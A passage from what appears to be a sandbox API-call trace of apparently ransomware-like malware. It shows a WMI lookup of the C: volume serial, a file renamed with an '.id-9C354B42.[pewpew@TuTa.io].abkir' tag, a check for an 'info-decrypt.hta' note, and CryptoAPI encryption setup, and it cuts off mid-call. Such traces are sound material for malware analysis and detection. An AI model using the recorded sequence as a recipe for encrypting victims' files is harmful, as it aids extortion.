[7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.130] WbemDefPath:IUnknown:Release (This=0x66cca08) returned 0x3 [0151.130] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0151.130] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0151.130] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0151.130] WbemDefPath:IUnknown:Release (This=0x6025a70) returned 0x2 [0151.130] WbemDefPath:IUnknown:Release (This=0x6025a70) returned 0x1 [0151.130] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0151.130] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0151.130] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a70, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6025a70) returned 0x0 [0151.130] WbemDefPath:IUnknown:AddRef (This=0x6025a70) returned 0x3 [0151.130] WbemDefPath:IUnknown:Release (This=0x6025a70) returned 0x2 [0151.130] WbemDefPath:IWbemPath:SetText (This=0x6025a70, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0151.130] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025a70, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0151.130] WbemDefPath:IWbemPath:GetText (in: This=0x6025a70, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0151.130] WbemDefPath:IWbemPath:GetText (in: This=0x6025a70, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.130] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0151.130] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0151.130] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0151.130] IUnknown:Release (This=0xb51e34) returned 0x1 [0151.131] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x60271f8) returned 0x0 [0151.131] WbemLocator:IUnknown:QueryInterface (in: This=0x60271f8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0151.131] WbemLocator:IClassFactory:CreateInstance (in: This=0x60271f8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x6024a40) returned 0x0 [0151.131] WbemLocator:IUnknown:Release (This=0x60271f8) returned 0x0 [0151.131] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a40, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x6024a40) returned 0x0 [0151.131] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a40, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0151.132] WbemLocator:IUnknown:AddRef (This=0x6024a40) returned 0x3 [0151.132] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a40, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0151.132] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a40, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0151.132] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a40, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0151.132] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0151.132] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0151.132] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a40, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0151.132] WbemLocator:IUnknown:Release (This=0x6024a40) returned 0x2 [0151.132] WbemLocator:IUnknown:Release (This=0x6024a40) returned 0x1 [0151.132] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0151.132] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0151.132] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a40, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x6024a40) returned 0x0 [0151.132] WbemLocator:IUnknown:AddRef (This=0x6024a40) returned 0x3 [0151.132] WbemLocator:IUnknown:Release (This=0x6024a40) returned 0x2 [0151.132] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025a70, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0151.132] WbemDefPath:IWbemPath:GetText (in: This=0x6025a70, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0151.132] WbemDefPath:IWbemPath:GetText (in: This=0x6025a70, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.132] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6024a50) returned 0x0 [0151.132] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024a50, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x6024694) returned 0x0 [0153.148] WbemLocator:IUnknown:QueryInterface (in: This=0x6024694, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5b404) returned 0x0 [0153.148] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b404, pProxy=0x6024694, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0153.148] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x1 [0153.148] WbemLocator:IUnknown:QueryInterface (in: This=0x6024694, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5b424) returned 0x0 [0153.148] WbemLocator:IUnknown:QueryInterface (in: This=0x6024694, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5b404) returned 0x0 [0153.148] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b404, pProxy=0x6024694, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0153.149] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x2 [0153.149] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0153.149] CoTaskMemFree (pv=0xbd4a38) [0153.149] WbemLocator:IUnknown:Release (This=0x6024a50) returned 0x0 [0153.149] WbemLocator:IUnknown:QueryInterface (in: This=0x6024694, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5b424) returned 0x0 [0153.149] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0153.152] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0153.153] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0153.153] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0153.155] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0153.155] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5b384) returned 0x0 [0153.156] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b384, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0153.156] WbemLocator:IUnknown:Release (This=0xb5b384) returned 0x3 [0153.156] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0153.156] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0153.156] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5b40c) returned 0x0 [0153.156] WbemLocator:IRpcOptions:Query (in: This=0xb5b40c, pPrx=0xb5b424, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0153.156] WbemLocator:IUnknown:Release (This=0xb5b40c) returned 0x3 [0153.156] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0153.156] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0153.156] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0153.156] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x6024694) returned 0x0 [0153.156] WbemLocator:IUnknown:AddRef (This=0x6024694) returned 0x4 [0153.156] WbemLocator:IUnknown:Release (This=0x6024694) returned 0x3 [0153.156] WbemLocator:IUnknown:Release (This=0x6024694) returned 0x2 [0153.156] SysStringLen (param_1=0x0) returned 0x0 [0153.156] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025a00, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0153.156] WbemDefPath:IWbemPath:GetText (in: This=0x6025a00, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0153.156] WbemDefPath:IWbemPath:GetText (in: This=0x6025a00, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0153.157] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0153.157] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0153.157] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5b424) returned 0x0 [0153.157] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x3 [0153.157] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0153.157] WbemDefPath:IWbemPath:GetText (in: This=0x6025a00, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0153.157] WbemDefPath:IWbemPath:GetText (in: This=0x6025a00, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0153.157] IWbemServices:GetObject (in: This=0x6024694, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x60287e0, ppCallResult=0x0) returned 0x0 [0153.727] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025a70, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0153.727] WbemDefPath:IWbemPath:GetText (in: This=0x6025a70, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0153.727] WbemDefPath:IWbemPath:GetText (in: This=0x6025a70, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0153.728] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36deae8*=0, plFlavor=0x36deaec*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36deae8*=8, plFlavor=0x36deaec*=0) returned 0x0 [0153.728] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.728] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.728] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36deae8*=8, plFlavor=0x36deaec*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36deae8*=8, plFlavor=0x36deaec*=0) returned 0x0 [0153.728] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.728] SysStringByteLen (bstr="9C354B42") returned 0x10 [0153.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0153.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x5d [0153.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0153.728] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x17d79600, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0153.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0153.729] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0153.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0153.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", lpFilePart=0x0) returned 0x42 [0153.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0153.730] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x159ead60, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x159ead60, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x159ead60, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0153.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0153.731] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0153.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0153.731] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), fInfoLevelId=0x0, lpFileInformation=0x36df094 | out: lpFileInformation=0x36df094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0)) returned 1 [0153.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0153.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0153.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0153.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0153.733] GetFileType (hFile=0x2f0) returned 0x1 [0153.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0153.733] GetFileType (hFile=0x2f0) returned 0x1 [0153.733] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x99ba0 [0153.733] ReadFile (in: hFile=0x2f0, lpBuffer=0x525f480, nNumberOfBytesToRead=0x99ba0, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x525f480*, lpNumberOfBytesRead=0x6d8edac*=0x99ba0, lpOverlapped=0x0) returned 1 [0153.751] CloseHandle (hObject=0x2f0) returned 1 [0153.751] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbdf948) returned 1 [0153.753] CryptGenRandom (in: hProv=0xbdf948, dwLen=0x10, pbBuffer=0x36df944 | out: pbBuffer=0x36df944) returned 1 [0154.344] CryptImportKey (in: hProv=0xbdf948, pbData=0x3784aac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xbe1528) returned 1 [0154.344] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0154.344] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0154.344] CryptDuplicateKey (in: hKey=0xbe1528, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xbe1628) returned 1 [0154.344] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0154.344] CryptSetKeyParam (hKey=0xbe1628, dwParam=0x4, pbData=0x3784b8c*=0x1, dwFlags=0x0) returned 1 [0154.344] CryptSetKeyParam (hKey=0xbe1628, dwParam=0x1, pbData=0x3784b58, dwFlags=0x0) returned 1 [0155.210] CryptEncrypt (in: 